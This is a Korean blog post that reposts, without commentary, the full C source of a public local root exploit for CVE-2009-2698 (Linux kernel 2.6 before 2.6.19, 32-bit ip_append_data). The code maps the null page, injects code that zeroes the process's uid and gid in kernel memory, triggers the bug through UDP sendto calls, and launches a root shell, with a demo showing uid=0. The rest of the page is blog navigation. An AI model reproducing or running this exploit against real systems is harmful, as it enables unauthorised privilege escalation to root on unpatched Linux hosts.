반응형
inetcop.c
/* ** ** 0x82-CVE-2009-2698 ** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit ** ** Tested White Box 4(2.6.9-5.ELsmp), ** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp), ** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5), ** Fedora Core 6(2.6.18-1.2798.fc6). ** ** -- ** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team. ** Thankful to them. ** ** -- ** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698 ** sh-3.1# id ** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t ** sh-3.1# ** -- ** exploit by. ** */ #include #include #include #include #include #include #include unsigned int uid, gid; void get_root_uid(unsigned *task) { unsigned *addr=task; while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){ addr++; } addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */ addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */ return; } void exploit(); void kernel_code() { asm("exploit:\n" "push %eax\n" "movl $0xfffff000,%eax\n" "andl %esp,%eax\n" "pushl (%eax)\n" "call get_root_uid\n" "addl $4,%esp\n" "popl %eax\n"); return; } void *kernel=kernel_code; int main(int argc, char **argv) { int fd=0; char buf[1024]; struct sockaddr x0x; void *zero_page; uid=getuid(); gid=getgid(); if(uid==0){ fprintf(stderr,"[-] check ur uid\n"); return -1; } if(personality(0xffffffff)==PER_SVR4){ if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){ perror("[-] mprotect()"); return -1; } } else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){ perror("[-] mmap()"); return -1; } *(unsigned long *)0x0=0x90909090; *(char *)0x00000004=0x90; /* +1 */ *(char *)0x00000005=0xff; *(char *)0x00000006=0x25; *(unsigned long *)0x00000007=(unsigned long)&kernel; *(char *)0x0000000b=0xc3; if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){ perror("[-] socket()"); return -1; } x0x.sa_family=AF_UNSPEC; memset(x0x.sa_data,0x82,14); memset((char *)buf,0,sizeof(buf)); sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x)); sendto(fd,buf,1024,0,&x0x,sizeof(x0x)); if(getuid()==uid){ printf("[-] exploit failed, try again\n"); return -1; } close(fd); execl("/bin/sh","sh","-i",NULL); return 0; } /* eoc */ // milw0rm.com [2009-08-31]
반응형
'Etc' 카테고리의 다른 글
가비아(Gabia) 도메인을 티스토리(Tistory) 기본도메인 대신 사용하기 (0) | 2017.03.07 |
---|---|
논설문) 사물인터넷(IoT)과 보안 (0) | 2017.01.31 |
파일 무결성 검증을 위한 Hashtap(해쉬탭) 다운로드/ 사용법 (0) | 2017.01.04 |
Winscp를 이용하여 가상머신(VM)으로 파일 옮기는 방법 (0) | 2016.08.15 |
2016 Secuinside 2nd (0) | 2016.07.13 |
최근댓글